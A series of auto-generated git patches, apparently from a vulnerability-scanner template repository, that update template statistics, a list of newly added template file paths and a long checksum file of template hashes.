dns | 18 | unknown | 27 | | | +| cve | 1949 | dhiyaneshdk | 907 | http | 6047 | info | 2940 | file | 142 | +| panel | 958 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | +| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1113 | | | +| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 724 | | | +| xss | 695 | pdteam | 280 | ssl | 24 | low | 224 | | | +| wp-plugin | 691 | pussycat0x | 261 | dns | 18 | unknown | 27 | | | | osint | 652 | geeknik | 221 | headless | 9 | | | | | -| tech | 614 | ricardomaia | 220 | contributors.json | 1 | | | | | -| edb | 597 | ritikchaddha | 217 | cves.json | 1 | | | | | -| lfi | 557 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| tech | 618 | ricardomaia | 220 | contributors.json | 1 | | | | | +| edb | 598 | ritikchaddha | 218 | TEMPLATES-STATS.json | 1 | | | | | +| lfi | 558 | 0x_akoko | 179 | cves.json | 1 | | | | | -**412 directories, 6679 files**. +**424 directories, 6769 files**. From 5c7b872f24d08f14a77aae78aaf288546cd37f44 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 17:32:54 +0000 Subject: [PATCH 535/609] Auto Generated New Template Addition List [Sat Jul 8 17:32:54 UTC 2023] :robot: --- .new-additions | 91 +------------------------------------------------- 1 file changed, 1 insertion(+), 90 deletions(-) diff --git a/.new-additions b/.new-additions index c6faf2507f..298f4e170f 100644 --- a/.new-additions +++ b/.new-additions @@ -1,90 +1 @@ -file/keys/adafruit-key.yaml -file/keys/adobe/adobe-client.yaml -file/keys/airtable-key.yaml -file/keys/algolia-key.yaml -file/keys/alibaba/alibaba-key-id.yaml -file/keys/alibaba/alibaba-secret-id.yaml -file/keys/asana/asana-clientid.yaml -file/keys/asana/asana-clientsecret.yaml -file/keys/atlassian/atlassian-api-token.yaml -file/webshell/asp-webshell.yaml -file/webshell/jsp-webshell.yaml -file/webshell/php-webshell.yaml -http/cnvd/2022/CNVD-2022-86535.yaml -http/cves/2012/CVE-2012-5321.yaml -http/cves/2018/CVE-2018-6530.yaml -http/cves/2019/CVE-2019-14789.yaml -http/cves/2019/CVE-2019-8390.yaml -http/cves/2020/CVE-2020-19515.yaml -http/cves/2020/CVE-2020-35984.yaml -http/cves/2020/CVE-2020-35985.yaml -http/cves/2020/CVE-2020-35986.yaml -http/cves/2020/CVE-2020-35987.yaml -http/cves/2022/CVE-2022-4295.yaml -http/cves/2022/CVE-2022-43164.yaml -http/cves/2022/CVE-2022-43165.yaml -http/cves/2022/CVE-2022-43166.yaml -http/cves/2022/CVE-2022-43167.yaml -http/cves/2022/CVE-2022-43169.yaml -http/cves/2022/CVE-2022-43170.yaml -http/cves/2022/CVE-2022-43185.yaml -http/cves/2022/CVE-2022-44944.yaml -http/cves/2022/CVE-2022-44946.yaml -http/cves/2022/CVE-2022-44947.yaml -http/cves/2022/CVE-2022-44948.yaml -http/cves/2022/CVE-2022-44949.yaml -http/cves/2022/CVE-2022-44950.yaml -http/cves/2022/CVE-2022-44951.yaml -http/cves/2022/CVE-2022-44952.yaml -http/cves/2023/CVE-2023-0297.yaml -http/cves/2023/CVE-2023-0514.yaml -http/cves/2023/CVE-2023-1730.yaml -http/cves/2023/CVE-2023-1835.yaml -http/cves/2023/CVE-2023-1890.yaml -http/cves/2023/CVE-2023-2023.yaml -http/cves/2023/CVE-2023-2252.yaml -http/cves/2023/CVE-2023-2272.yaml -http/cves/2023/CVE-2023-28121.yaml -http/cves/2023/CVE-2023-2822.yaml -http/cves/2023/CVE-2023-30256.yaml -http/cves/2023/CVE-2023-30777.yaml -http/cves/2023/CVE-2023-33439.yaml -http/cves/2023/CVE-2023-36287.yaml -http/cves/2023/CVE-2023-36289.yaml -http/cves/2023/CVE-2023-36346.yaml -http/default-logins/esafenet-cdg-default-login.yaml -http/default-logins/leostream/leostream-default-login.yaml -http/default-logins/pyload/pyload-default-login.yaml -http/exposed-panels/arangodb-web-Interface.yaml -http/exposed-panels/arcserve-panel.yaml -http/exposed-panels/c2/hookbot-rat.yaml -http/exposed-panels/c2/mystic-stealer.yaml -http/exposed-panels/cloudpanel-login.yaml -http/exposed-panels/dell-idrac.yaml -http/exposed-panels/efak-login-panel.yaml -http/exposed-panels/pritunl-panel.yaml -http/exposed-panels/pyload-panel.yaml -http/exposed-panels/qdpm-login-panel.yaml -http/exposed-panels/shell-box.yaml -http/exposed-panels/untangle-admin-login.yaml -http/exposed-panels/uptime-kuma-panel.yaml -http/exposures/configs/collibra-properties.yaml -http/exposures/files/pnpm-lock.yaml -http/exposures/tokens/adafruit/adafruit-api-key.yaml -http/exposures/tokens/adobe/adobe-client-id.yaml -http/exposures/tokens/airtable/airtable-api-key.yaml -http/exposures/tokens/algolia/algolia-api-key.yaml -http/exposures/tokens/alibaba/alibaba-accesskey-id.yaml -http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml -http/exposures/tokens/asana/asana-client-id.yaml -http/exposures/tokens/asana/asana-client-secret.yaml -http/exposures/tokens/atlassian-token.yaml -http/misconfiguration/proxy/open-proxy-external.yaml -http/misconfiguration/unauth-temporal-web-ui.yaml -http/vulnerabilities/other/sitemap-sql-injection.yaml -http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml -http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml -http/vulnerabilities/wordpress/notificationx-sqli.yaml -http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml -network/misconfig/apache-dubbo-unauth.yaml -network/misconfig/apache-rocketmq-broker-unauth.yaml +http/exposed-panels/sunbird-dcim-panel.yaml From 1f5df70e195fdf063d400b135f11f11408fd3291 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 17:33:09 +0000 Subject: [PATCH 536/609] Auto Generated Templates Checksum [Sat Jul 8 17:33:09 UTC 2023] :robot: --- templates-checksum.txt | 413 +++++++++++++++++++++-------------------- 1 file changed, 207 insertions(+), 206 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 68ad8891a1..0765f0ba0c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:e4fd537abe53ce59a671693fa6edba3543a7cdbd +README.md:3a8c21530bafd4fb8348772558f2cd9b9d54a2fb README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:b322c9ba292e0298b561b25a8950e989c4b50787 -TEMPLATES-STATS.md:a53dea26d4e3da65292a159ecd28b58abe0f6f3a -TOP-10.md:f96c096252794274c196f158e78053e036412447 +TEMPLATES-STATS.json:e268bd37316310244916d616fd87c09b09033472 +TEMPLATES-STATS.md:97fbc54da963e2a9d0b1aedd747203808e78dddb +TOP-10.md:d23a36ee425b3324a3837f19b9ed7971a950c597 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 cves.json:84b562fb5aaa54405334753d9224c53d4d0745d9 cves.json-checksum.txt:73b1d3e2dab71403691dc766cbf795cfd0a12ecb @@ -3248,6 +3248,7 @@ http/exposed-panels/stridercd-panel.yaml:099616203a52687b85d16898c7127105d66ca23 http/exposed-panels/submitty-login.yaml:1c37ee3ec0ecaad6999d70aab9f9b849790e3ab2 http/exposed-panels/subrion-login.yaml:bc2fef03bd048cb66d4b0391797a586ee014f3e0 http/exposed-panels/sugarcrm-panel.yaml:4cce39ea3d3d5392df144c6339e237108675ce60 +http/exposed-panels/sunbird-dcim-panel.yaml:8e34c0028db7c29c09342340672ffb301f4f8e09 http/exposed-panels/sungrow-logger1000-detect.yaml:774c8401adc0639a1ad0df8ab42180e515f0a57f http/exposed-panels/superadmin-ui-panel.yaml:3d5772eddb991f1bafa5e7531266d067e2aa0b48 http/exposed-panels/supermicro-bmc-panel.yaml:184070c4e6cccba884469692726043efde42472a @@ -4229,7 +4230,7 @@ http/misconfiguration/proxy/metadata-google.yaml:1af1293a92a2a863c8e559340dc4c18 http/misconfiguration/proxy/metadata-hetzner.yaml:dd8f9a2d9450f969568011d5464f68657bb0bceb http/misconfiguration/proxy/metadata-openstack.yaml:d108d421eba03be5e1dc95e3f2925a0d514d3a2d http/misconfiguration/proxy/metadata-oracle.yaml:74e6d921d81b38db938225ca24f104a48fceeee2 -http/misconfiguration/proxy/open-proxy-external.yaml:ce529af151621630c885b51cf7a07bb1e149518b +http/misconfiguration/proxy/open-proxy-external.yaml:e828274393b37f6bdec3ca82af378afece2fad44 http/misconfiguration/proxy/open-proxy-internal.yaml:4fdc217e331de9cc7cd2479953d1f38113eae123 http/misconfiguration/proxy/open-proxy-localhost.yaml:3e9ac6a8f82562a031e5c6e127501756cf7e92b4 http/misconfiguration/proxy/open-proxy-portscan.yaml:3200511b91414463b697697946b3379748bcd268 @@ -5411,214 +5412,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 